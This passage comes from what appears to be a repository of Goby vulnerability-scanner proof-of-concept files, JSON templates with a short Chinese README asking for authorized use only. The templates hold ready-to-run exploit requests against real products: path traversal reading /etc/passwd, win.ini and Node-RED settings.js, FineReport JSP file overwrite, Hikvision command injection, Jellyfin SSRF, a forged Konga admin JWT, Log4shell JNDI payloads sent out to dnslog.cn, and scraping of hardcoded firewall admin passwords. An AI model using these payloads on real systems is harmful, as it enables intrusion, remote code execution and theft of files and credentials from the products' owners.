93 | "variable": "$body", 94 | "operation": "contains", 95 | "value": "<title>Dubbo Admin</title>", 96 | "bz": "" 97 | }, 98 | { 99 | "type": "item", 100 | "variable": "$body", 101 | "operation": "contains", 102 | "value": "/sysinfo/versions", 103 | "bz": "" 104 | } 105 | ] 106 | }, 107 | "SetVariable": [ 108 | "output|lastbody|regex|" 109 | ] 110 | } 111 | ], 112 | "PostTime": "2021-11-28 13:12:18", 113 | "GobyVersion": "1.9.310" 114 | } -------------------------------------------------------------------------------- /Fastmeeting_Arbitrary_File_Read.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "好视通云会议存在任意文件读取漏洞", 3 | "Level": "2", 4 | "Tags": [ 5 | "fileread" 6 | ], 7 | "GobyQuery": "body=\"深圳银澎云计算有限公司\"", 8 | "Description": "好视通云会议存在任意文件读取漏洞", 9 | "Product": "好视通云会议", 10 | "Homepage": "https://www.hst.com/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://mp.weixin.qq.com/s/fMNE1PF5n81O1BpoDRlYkA" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "Name": "Filepath", 21 | "Type": "input", 22 | "Value": "../../../../../../../../../../../../../../windows/win.ini" 23 | } 24 | ], 25 | "ExpTips": { 26 | "Type": "", 27 | "Content": "" 28 | }, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "method": "GET", 34 | "uri": "/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini", 35 | "follow_redirect": false, 36 | "header": null, 37 | "data_type": "text", 38 | "data": "", 39 | "set_variable": [] 40 | }, 41 | "ResponseTest": { 42 | "type": "group", 43 | "operation": "AND", 44 | "checks": [ 45 | { 46 | "type": "item", 47 | "variable": "$code", 48 | "operation": "==", 49 | "value": "200", 50 | "bz": "" 51 | }, 52 | { 53 | "type": "item", 54 | "variable": "$body", 55 | "operation": "contains", 56 | "value": "[fonts]", 57 | "bz": "" 58 | }, 59 | { 60 | "type": "item", 61 | "variable": "$body", 62 | "operation": "contains", 63 | "value": "[extensions]", 64 | "bz": "" 65 | } 66 | ] 67 | }, 68 | "SetVariable": [ 69 | "output|lastbody|regex|" 70 | ] 71 | } 72 | ], 73 | "ExploitSteps": [ 74 | "AND", 75 | { 76 | "Request": { 77 | "method": "GET", 78 | "uri": "/register/toDownload.do?fileName={{{Filepath}}}", 79 | "follow_redirect": false, 80 | "header": null, 81 | "data_type": "text", 82 | "data": "", 83 | "set_variable": [] 84 | }, 85 | "ResponseTest": { 86 | "type": "group", 87 | "operation": "AND", 88 | "checks": [ 89 | { 90 | "type": "item", 91 | "variable": "$code", 92 | "operation": "==", 93 | "value": "200", 94 | "bz": "" 95 | } 96 | ] 97 | }, 98 | "SetVariable": [ 99 | "output|lastbody||" 100 | ] 101 | } 102 | ], 103 | "PostTime": "2021-12-11 14:50:39", 104 | "GobyVersion": "1.9.310" 105 | } -------------------------------------------------------------------------------- /FineReport_v9_Arbitrary_File_Overwrite.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "FineReport v9 Arbitrary File Overwrite", 3 | "Level": "3", 4 | "Tags": [ 5 | "overwrite" 6 | ], 7 | "GobyQuery": "app=\"fanruansem-FineReport\"", 8 | "Description": "由于在初始化svg文件时,未对传入的参数做限制,导致可以对已存在的文件覆盖写入数据,从而通过将木马写入jsp文件中获取服务器权限", 9 | "Product": "帆软-FineReport", 10 | "Homepage": "https://www.fanruan.com/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://github.com/NHPT/WebReportV9Exp/blob/main/WebReport_Exp.py" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "POST", 28 | "uri": "/WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/a.svg.jsp", 29 | "follow_redirect": false, 30 | "header": { 31 | "Content-Type": "application/json" 32 | }, 33 | "data_type": "text", 34 | "data": "{\"__CONTENT__\":{{{str1}}},\"__CHARSET__\":\"UTF-8\"}", 35 | "set_variable": [ 36 | "str1|rand|str|7" 37 | ] 38 | }, 39 | "ResponseTest": { 40 | "type": "group", 41 | "operation": "AND", 42 | "checks": [ 43 | { 44 | "type": "item", 45 | "variable": "$code", 46 | "operation": "==", 47 | "value": "200", 48 | "bz": "" 49 | } 50 | ] 51 | }, 52 | "SetVariable": [ 53 | "output|lastbody|regex|" 54 | ] 55 | }, 56 | { 57 | "Request": { 58 | "method": "GET", 59 | "uri": "/WebReport/a.svg.jsp", 60 | "follow_redirect": false, 61 | "header": null, 62 | "data_type": "text", 63 | "data": "", 64 | "set_variable": [] 65 | }, 66 | "ResponseTest": { 67 | "type": "group", 68 | "operation": "AND", 69 | "checks": [ 70 | { 71 | "type": "item", 72 | "variable": "$code", 73 | "operation": "==", 74 | "value": "200", 75 | "bz": "" 76 | }, 77 | { 78 | "type": "item", 79 | "variable": "$body", 80 | "operation": "contains", 81 | "value": "{{{str1}}}", 82 | "bz": "" 83 | } 84 | ] 85 | }, 86 | "SetVariable": [ 87 | "output|lastbody|regex|" 88 | ] 89 | } 90 | ], 91 | "PostTime": "2021-12-08 11:22:44", 92 | "GobyVersion": "1.9.310" 93 | } -------------------------------------------------------------------------------- /Grafana_Plugins_Arbitrary_File_Read.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Grafana Plugins Arbitrary File Read CVE-2021-43798", 3 | "Level": "3", 4 | "Tags": [ 5 | "fileread" 6 | ], 7 | "GobyQuery": "( app=\"Grafana\" | title==\"Grafana\" )", 8 | "Description": "Grafana是用于可视化大型测量数据的开源程序,他提供了强大和优雅的方式去创建、共享、浏览数据。dashboard中显示了你不同metric数据源中的数据。通过默认存在的插件,可构造特殊的请求包读取服务器任意文件。", 9 | "Product": "Grafana", 10 | "Homepage": "https://grafana.com/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://mp.weixin.qq.com/s/DTkVTtbndaMWL9WGzaI32A" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "Name": "Path", 21 | "Type": "input", 22 | "Value": "../../../../../../../../../etc/passwd" 23 | } 24 | ], 25 | "ExpTips": { 26 | "Type": "", 27 | "Content": "" 28 | }, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "method": "GET", 34 | "uri": "/public/plugins/welcome/../../../../../../../../../etc/passwd", 35 | "follow_redirect": false, 36 | "header": null, 37 | "data_type": "text", 38 | "data": "", 39 | "set_variable": [] 40 | }, 41 | "ResponseTest": { 42 | "type": "group", 43 | "operation": "AND", 44 | "checks": [ 45 | { 46 | "type": "item", 47 | "variable": "$code", 48 | "operation": "==", 49 | "value": "200", 50 | "bz": "" 51 | }, 52 | { 53 | "type": "item", 54 | "variable": "$body", 55 | "operation": "contains", 56 | "value": "root:x:", 57 | "bz": "" 58 | }, 59 | { 60 | "type": "item", 61 | "variable": "$body", 62 | "operation": "contains", 63 | "value": "daemon:x:", 64 | "bz": "" 65 | } 66 | ] 67 | }, 68 | "SetVariable": [ 69 | "output|lastbody|regex|" 70 | ] 71 | } 72 | ], 73 | "ExploitSteps": [ 74 | "AND", 75 | { 76 | "Request": { 77 | "method": "GET", 78 | "uri": "/public/plugins/welcome/{{{Path}}}", 79 | "follow_redirect": false, 80 | "header": null, 81 | "data_type": "text", 82 | "data": "", 83 | "set_variable": [] 84 | }, 85 | "ResponseTest": { 86 | "type": "group", 87 | "operation": "AND", 88 | "checks": [ 89 | { 90 | "type": "item", 91 | "variable": "$code", 92 | "operation": "==", 93 | "value": "200", 94 | "bz": "" 95 | } 96 | ] 97 | }, 98 | "SetVariable": [ 99 | "output|lastbody||" 100 | ] 101 | } 102 | ], 103 | "PostTime": "2021-12-08 13:56:21", 104 | "GobyVersion": "1.9.310" 105 | } -------------------------------------------------------------------------------- /Hikvision_RCE_CVE_2021_36260.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Hikvision RCE CVE-2021-36260", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "app=\"Hikvision-Cameras-and-Surveillance\"", 8 | "Description": "攻击者利用该漏洞可以用无限制的root shell来完全控制设备,即使设备的所有者受限于有限的受保护shell(psh)。除了入侵IP摄像头外,还可以访问和攻击内部网络。\n该漏洞的利用并不需要用户交互,攻击者只需要访问http或HTTPS服务器端口(80/443)即可利用该漏洞,无需用户名、密码、以及其他操作。摄像头本身也不会检测到任何登录信息。", 9 | "Product": "hikvision", 10 | "Homepage": "https://www.hikvision.com/cn/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$code", 42 | "operation": "==", 43 | "value": "200", 44 | "bz": "" 45 | } 46 | ] 47 | }, 48 | "SetVariable": [ 49 | "output|lastheader|regex|" 50 | ] 51 | }, 52 | { 53 | "Request": { 54 | "method": "PUT", 55 | "uri": "/SDK/webLanguage", 56 | "follow_redirect": false, 57 | "header": { 58 | "X-Requested-With": "XMLHttpRequest", 59 | "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8" 60 | }, 61 | "data_type": "text", 62 | "data": "\n$(ls -l >webLib/c)", 63 | "set_variable": [] 64 | }, 65 | "ResponseTest": { 66 | "type": "group", 67 | "operation": "AND", 68 | "checks": [ 69 | { 70 | "type": "item", 71 | "variable": "$code", 72 | "operation": "==", 73 | "value": "500", 74 | "bz": "" 75 | } 76 | ] 77 | }, 78 | "SetVariable": [ 79 | "output|lastbody|regex|" 80 | ] 81 | }, 82 | { 83 | "Request": { 84 | "method": "GET", 85 | "uri": "/c", 86 | "follow_redirect": false, 87 | "header": null, 88 | "data_type": "text", 89 | "data": "", 90 | "set_variable": [] 91 | }, 92 | "ResponseTest": { 93 | "type": "group", 94 | "operation": "AND", 95 | "checks": [ 96 | { 97 | "type": "item", 98 | "variable": "$code", 99 | "operation": "==", 100 | "value": "200", 101 | "bz": "" 102 | } 103 | ] 104 | }, 105 | "SetVariable": [ 106 | "output|lastbody||" 107 | ] 108 | } 109 | ], 110 | "PostTime": "2021-11-17 13:28:08", 111 | "GobyVersion": "1.8.302" 112 | } -------------------------------------------------------------------------------- /Jellyfin_SSRF_CVE_2021_29490.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Jellyfin SSRF CVE-2021-29490", 3 | "Level": "3", 4 | "Tags": [ 5 | "ssrf" 6 | ], 7 | "GobyQuery": "title==\"Jellyfin\"", 8 | "Description": "A Server-Side Request Forgery (SSRF) flaw was found in mod_proxy of httpd. This flaw allows a remote, unauthenticated attacker to make the httpd server forward requests to an arbitrary server. The attacker could get, modify, or delete resources on other services that may be behind a firewall and inaccessible otherwise. The impact of this flaw varies based on what services and resources are available on the httpd network.", 9 | "Product": "Jellyfin", 10 | "Homepage": "https://jellyfin.org/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://mp.weixin.qq.com/s?__biz=MzkwNDI1NDUwMQ==&mid=2247485439&idx=3&sn=4bd6fc982541ca3ec610856c37a36c14" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "OR", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/Images/Remote?imageUrl=http://{{{check}}}", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [ 34 | "check|dnslog|4|15" 35 | ] 36 | }, 37 | "ResponseTest": { 38 | "type": "group", 39 | "operation": "AND", 40 | "checks": [ 41 | { 42 | "type": "item", 43 | "variable": "$code", 44 | "operation": "==", 45 | "value": "200", 46 | "bz": "" 47 | }, 48 | { 49 | "type": "item", 50 | "variable": "$dns", 51 | "operation": "contains", 52 | "value": "{{{check}}}", 53 | "bz": "" 54 | } 55 | ] 56 | }, 57 | "SetVariable": [ 58 | "output|lastbody|regex|" 59 | ] 60 | }, 61 | { 62 | "Request": { 63 | "method": "GET", 64 | "uri": "/Images/Remote?imageUrl=http://www.baidu.com", 65 | "follow_redirect": false, 66 | "header": null, 67 | "data_type": "text", 68 | "data": "", 69 | "set_variable": [] 70 | }, 71 | "ResponseTest": { 72 | "type": "group", 73 | "operation": "AND", 74 | "checks": [ 75 | { 76 | "type": "item", 77 | "variable": "$code", 78 | "operation": "==", 79 | "value": "200", 80 | "bz": "" 81 | }, 82 | { 83 | "type": "item", 84 | "variable": "$body", 85 | "operation": "contains", 86 | "value": "百度", 87 | "bz": "" 88 | } 89 | ] 90 | }, 91 | "SetVariable": [ 92 | "output|lastbody|regex|" 93 | ] 94 | } 95 | ], 96 | "ExploitSteps": [ 97 | "AND", 98 | { 99 | "Request": { 100 | "method": "GET", 101 | "uri": "/test.php", 102 | "follow_redirect": true, 103 | "header": null, 104 | "data_type": "text", 105 | "data": "", 106 | "set_variable": [] 107 | }, 108 | "ResponseTest": { 109 | "type": "group", 110 | "operation": "AND", 111 | "checks": [ 112 | { 113 | "type": "item", 114 | "variable": "$code", 115 | "operation": "==", 116 | "value": "200", 117 | "bz": "" 118 | }, 119 | { 120 | "type": "item", 121 | "variable": "$body", 122 | "operation": "contains", 123 | "value": "test", 124 | "bz": "" 125 | } 126 | ] 127 | }, 128 | "SetVariable": [ 129 | "output|lastbody|regex|" 130 | ] 131 | } 132 | ], 133 | "PostTime": "2021-12-10 13:58:26", 134 | "GobyVersion": "1.9.310" 135 | } -------------------------------------------------------------------------------- /Konga_Default_JWT_KEY.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Konga Default JWT KEY", 3 | "Level": "3", 4 | "Tags": [ 5 | "defaultaccount" 6 | ], 7 | "GobyQuery": "(title==\"Konga\" | body=\"window.konga_version\")", 8 | "Description": "Konga JWT默认key为oursecret,可伪造任意用户权限。", 9 | "Product": "Konga", 10 | "Homepage": "https://github.com/pantsel/konga", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://mp.weixin.qq.com/s/8guU2hT3wE2puEztdGqZQg" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/api/user", 29 | "follow_redirect": false, 30 | "header": { 31 | "authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.MQ.gSssTBEVe6X9aFEd0H_tt8kk2u7df90W1eOzNRnrsQ4" 32 | }, 33 | "data_type": "text", 34 | "data": "", 35 | "set_variable": [] 36 | }, 37 | "ResponseTest": { 38 | "type": "group", 39 | "operation": "AND", 40 | "checks": [ 41 | { 42 | "type": "item", 43 | "variable": "$code", 44 | "operation": "==", 45 | "value": "200", 46 | "bz": "" 47 | }, 48 | { 49 | "type": "item", 50 | "variable": "$body", 51 | "operation": "contains", 52 | "value": "createdUser", 53 | "bz": "" 54 | }, 55 | { 56 | "type": "item", 57 | "variable": "$body", 58 | "operation": "contains", 59 | "value": "username", 60 | "bz": "" 61 | } 62 | ] 63 | }, 64 | "SetVariable": [ 65 | "output|lastbody||" 66 | ] 67 | } 68 | ], 69 | "ExploitSteps": [ 70 | "AND", 71 | { 72 | "Request": { 73 | "method": "GET", 74 | "uri": "/api/user", 75 | "follow_redirect": false, 76 | "header": { 77 | "authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.MQ.gSssTBEVe6X9aFEd0H_tt8kk2u7df90W1eOzNRnrsQ4" 78 | }, 79 | "data_type": "text", 80 | "data": "", 81 | "set_variable": [] 82 | }, 83 | "ResponseTest": { 84 | "type": "group", 85 | "operation": "AND", 86 | "checks": [ 87 | { 88 | "type": "item", 89 | "variable": "$code", 90 | "operation": "==", 91 | "value": "200", 92 | "bz": "" 93 | }, 94 | { 95 | "type": "item", 96 | "variable": "$body", 97 | "operation": "contains", 98 | "value": "createdUser", 99 | "bz": "" 100 | }, 101 | { 102 | "type": "item", 103 | "variable": "$body", 104 | "operation": "contains", 105 | "value": "username", 106 | "bz": "" 107 | } 108 | ] 109 | }, 110 | "SetVariable": [ 111 | "output|lastbody||" 112 | ] 113 | } 114 | ], 115 | "PostTime": "2021-12-03 18:50:39", 116 | "GobyVersion": "1.9.310" 117 | } -------------------------------------------------------------------------------- /Metabase_Geojson_Arbitrary_File_Read_CVE_2021_41277.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Metabase Geojson Arbitrary File Read CVE-2021-41277", 3 | "Level": "3", 4 | "Tags": [ 5 | "fileread" 6 | ], 7 | "GobyQuery": "(app=\"Metabase\" | title=\"Metabase\" | body=\"Metabase\")", 8 | "Description": "Metabase is an open source data analytics platform. In affected versions a security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. This issue is fixed in a new maintenance release (0.40.5 and 1.40.5), and any subsequent release after that. If you’re unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application.", 9 | "Product": "Metabase", 10 | "Homepage": "https://www.metabase.com/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247486238&idx=1&sn=0eea83880942b16975335739e1db5aa2" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "Name": "Path", 21 | "Type": "input", 22 | "Value": "/etc/passwd" 23 | } 24 | ], 25 | "ExpTips": { 26 | "Type": "", 27 | "Content": "" 28 | }, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "method": "GET", 34 | "uri": "/api/geojson?url=file:/etc/passwd", 35 | "follow_redirect": false, 36 | "header": null, 37 | "data_type": "text", 38 | "data": "", 39 | "set_variable": [] 40 | }, 41 | "ResponseTest": { 42 | "type": "group", 43 | "operation": "AND", 44 | "checks": [ 45 | { 46 | "type": "item", 47 | "variable": "$code", 48 | "operation": "==", 49 | "value": "200", 50 | "bz": "" 51 | }, 52 | { 53 | "type": "item", 54 | "variable": "$body", 55 | "operation": "contains", 56 | "value": "/root:/bin/ash", 57 | "bz": "" 58 | } 59 | ] 60 | }, 61 | "SetVariable": [ 62 | "output|lastbody||" 63 | ] 64 | } 65 | ], 66 | "ExploitSteps": [ 67 | "AND", 68 | { 69 | "Request": { 70 | "method": "GET", 71 | "uri": "/api/geojson?url=file:{{{Path}}}", 72 | "follow_redirect": false, 73 | "header": null, 74 | "data_type": "text", 75 | "data": "", 76 | "set_variable": [] 77 | }, 78 | "ResponseTest": { 79 | "type": "group", 80 | "operation": "AND", 81 | "checks": [ 82 | { 83 | "type": "item", 84 | "variable": "$code", 85 | "operation": "==", 86 | "value": "200", 87 | "bz": "" 88 | } 89 | ] 90 | }, 91 | "SetVariable": [ 92 | "output|lastbody||" 93 | ] 94 | } 95 | ], 96 | "PostTime": "2021-11-21 15:03:56", 97 | "GobyVersion": "1.8.302" 98 | } -------------------------------------------------------------------------------- /MobileIron_Log4shell_CVE_2021_44228.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "MobileIron Log4shell CVE-2021-44228", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "( title=\"MobileIron System Manager: Sign In\" | title=\"MobileIron User Portal: Sign In\" | title=\"MobileIron Benutzerportal: Anmeldung\" | title=\"MobileIron 用户门户:登录\" | title=\"MobileIron Portail utilisateur : connexion\")", 8 | "Description": "MobileIron存在log4j漏洞。", 9 | "Product": "MobileIron", 10 | "Homepage": "https://www.mobileiron.com/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "Name": "cmd", 21 | "Type": "input", 22 | "Value": "${jndi:ldap://dns.log/tea}" 23 | } 24 | ], 25 | "ExpTips": { 26 | "Type": "", 27 | "Content": "" 28 | }, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "method": "GET", 34 | "uri": "http://www.dnslog.cn/getdomain.php", 35 | "follow_redirect": false, 36 | "header": null, 37 | "data_type": "text", 38 | "data": "", 39 | "set_variable": [] 40 | }, 41 | "ResponseTest": { 42 | "type": "group", 43 | "operation": "AND", 44 | "checks": [ 45 | { 46 | "type": "item", 47 | "variable": "$code", 48 | "operation": "==", 49 | "value": "200", 50 | "bz": "" 51 | } 52 | ] 53 | }, 54 | "SetVariable": [ 55 | "dnstest|lastbody||" 56 | ] 57 | }, 58 | { 59 | "Request": { 60 | "method": "POST", 61 | "uri": "/mics/j_spring_security_check", 62 | "follow_redirect": false, 63 | "header": { 64 | "Content-Type": "application/x-www-form-urlencoded" 65 | }, 66 | "data_type": "text", 67 | "data": "j_username=${jndi:ldap://{{{dnstest}}}/tea}&j_password=${jndi:ldap://{{{dnstest}}}/tea}", 68 | "set_variable": [] 69 | }, 70 | "ResponseTest": { 71 | "type": "group", 72 | "operation": "AND", 73 | "checks": [] 74 | }, 75 | "SetVariable": [ 76 | "output|lastbody|regex|" 77 | ] 78 | }, 79 | { 80 | "Request": { 81 | "method": "GET", 82 | "uri": "http://www.dnslog.cn/getrecords.php", 83 | "follow_redirect": false, 84 | "header": null, 85 | "data_type": "text", 86 | "data": "", 87 | "set_variable": [] 88 | }, 89 | "ResponseTest": { 90 | "type": "group", 91 | "operation": "AND", 92 | "checks": [ 93 | { 94 | "type": "item", 95 | "variable": "$code", 96 | "operation": "==", 97 | "value": "200", 98 | "bz": "" 99 | }, 100 | { 101 | "type": "item", 102 | "variable": "$body", 103 | "operation": "contains", 104 | "value": "{{{dnstest}}}", 105 | "bz": "" 106 | } 107 | ] 108 | }, 109 | "SetVariable": [ 110 | "output|lastbody|regex|" 111 | ] 112 | } 113 | ], 114 | "ExploitSteps": [ 115 | "AND", 116 | { 117 | "Request": { 118 | "method": "POST", 119 | "uri": "/mics/j_spring_security_check", 120 | "follow_redirect": false, 121 | "header": { 122 | "Content-Type": "application/x-www-form-urlencoded" 123 | }, 124 | "data_type": "text", 125 | "data": "j_username={{{cmd}}}&j_password={{{cmd}}}", 126 | "set_variable": [] 127 | }, 128 | "ResponseTest": { 129 | "type": "group", 130 | "operation": "AND", 131 | "checks": [] 132 | }, 133 | "SetVariable": [ 134 | "output|lastbody|regex|" 135 | ] 136 | } 137 | ], 138 | "PostTime": "2022-01-10 13:53:47", 139 | "GobyVersion": "1.9.320" 140 | } -------------------------------------------------------------------------------- /Node_RED_ui_base_Arbitrary_File_Read.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Node-RED ui_base Arbitrary File Read", 3 | "Level": "2", 4 | "Tags": [ 5 | "fileread" 6 | ], 7 | "GobyQuery": "title=\"Node-RED\"", 8 | "Description": "Node-RED 在/nodes/ui_base.js中,URL与'/ui_base/js/*'匹配,然后传递给path.join,\n缺乏对最终路径的验证会导致路径遍历漏洞,可以利用这个漏洞读取服务器上的敏感数据,比如settings.js.", 9 | "Product": "Node-RED", 10 | "Homepage": "https://nodered.org/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://mp.weixin.qq.com/s/KRGKXAJQawXl88RBPTaAeg" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$code", 42 | "operation": "==", 43 | "value": "200", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "contains", 50 | "value": "root:x:", 51 | "bz": "" 52 | }, 53 | { 54 | "type": "item", 55 | "variable": "$body", 56 | "operation": "contains", 57 | "value": "bin:x:", 58 | "bz": "" 59 | } 60 | ] 61 | }, 62 | "SetVariable": [ 63 | "output|lastbody|regex|" 64 | ] 65 | } 66 | ], 67 | "ExploitSteps": [ 68 | "AND", 69 | { 70 | "Request": { 71 | "method": "GET", 72 | "uri": "/ui_base/js/..%2f..%2f..%2f..%2fsettings.js", 73 | "follow_redirect": false, 74 | "header": null, 75 | "data_type": "text", 76 | "data": "", 77 | "set_variable": [] 78 | }, 79 | "ResponseTest": { 80 | "type": "group", 81 | "operation": "AND", 82 | "checks": [ 83 | { 84 | "type": "item", 85 | "variable": "$code", 86 | "operation": "==", 87 | "value": "200", 88 | "bz": "" 89 | }, 90 | { 91 | "type": "item", 92 | "variable": "$body", 93 | "operation": "contains", 94 | "value": "username", 95 | "bz": "" 96 | }, 97 | { 98 | "type": "item", 99 | "variable": "$body", 100 | "operation": "contains", 101 | "value": "password", 102 | "bz": "" 103 | } 104 | ] 105 | }, 106 | "SetVariable": [ 107 | "output|lastbody||" 108 | ] 109 | } 110 | ], 111 | "PostTime": "2021-12-05 16:31:16", 112 | "GobyVersion": "1.9.310" 113 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 声明 2 | 本程序仅供于学习交流,请使用者遵守《中华人民共和国网络安全法》,勿将此脚本用于非授权的测试,脚本开发者不负任何连带法律责任。 3 | ### 0x001 4 | goby用起来还是蛮方便的,网上公开的poc太少,区别已公开的列表,打算一日一更吧(理想状态) 5 | 6 | (如果你没有红队版,赶紧使用!) 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /Security_Devices_Hardcoded_Password.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Security Devices Hardcoded Password", 3 | "Level": "2", 4 | "Tags": [ 5 | "infoleak" 6 | ], 7 | "GobyQuery": "body=\"var dkey_verify = Get_Verify_Info(hex_md5)\"", 8 | "Description": "中科网威、网域科技、锐捷、天工网络等防火墙web管理程序存在硬编码漏洞。", 9 | "Product": "多个", 10 | "Homepage": "无", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://mp.weixin.qq.com/s/59-rkZUWZNtJVgIbpULnxw" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$code", 42 | "operation": "==", 43 | "value": "200", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "contains", 50 | "value": "\"name\":\"admin\",\"password\":\"", 51 | "bz": "" 52 | } 53 | ] 54 | }, 55 | "SetVariable": [ 56 | "output|lastbody|regex|" 57 | ] 58 | } 59 | ], 60 | "ExploitSteps": [ 61 | "AND", 62 | { 63 | "Request": { 64 | "method": "GET", 65 | "uri": "/", 66 | "follow_redirect": false, 67 | "header": null, 68 | "data_type": "text", 69 | "data": "", 70 | "set_variable": [] 71 | }, 72 | "ResponseTest": { 73 | "type": "group", 74 | "operation": "AND", 75 | "checks": [ 76 | { 77 | "type": "item", 78 | "variable": "$code", 79 | "operation": "==", 80 | "value": "200", 81 | "bz": "" 82 | }, 83 | { 84 | "type": "item", 85 | "variable": "$body", 86 | "operation": "contains", 87 | "value": "\"name\":\"admin\",\"password\":\"", 88 | "bz": "" 89 | } 90 | ] 91 | }, 92 | "SetVariable": [ 93 | "output|lastbody|regex|var persons (.*)}];" 94 | ] 95 | } 96 | ], 97 | "PostTime": "2021-12-06 16:14:12", 98 | "GobyVersion": "1.9.310" 99 | } -------------------------------------------------------------------------------- /SonarQube_unauth_CVE_2020_27986.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "SonarQube unauth CVE-2020-27986", 3 | "Level": "3", 4 | "Tags": [ 5 | "unauth" 6 | ], 7 | "GobyQuery": "app=\"SonarQube\"", 8 | "Description": "SonarQube 8.4.2.36762 allows remote attackers to discover cleartext 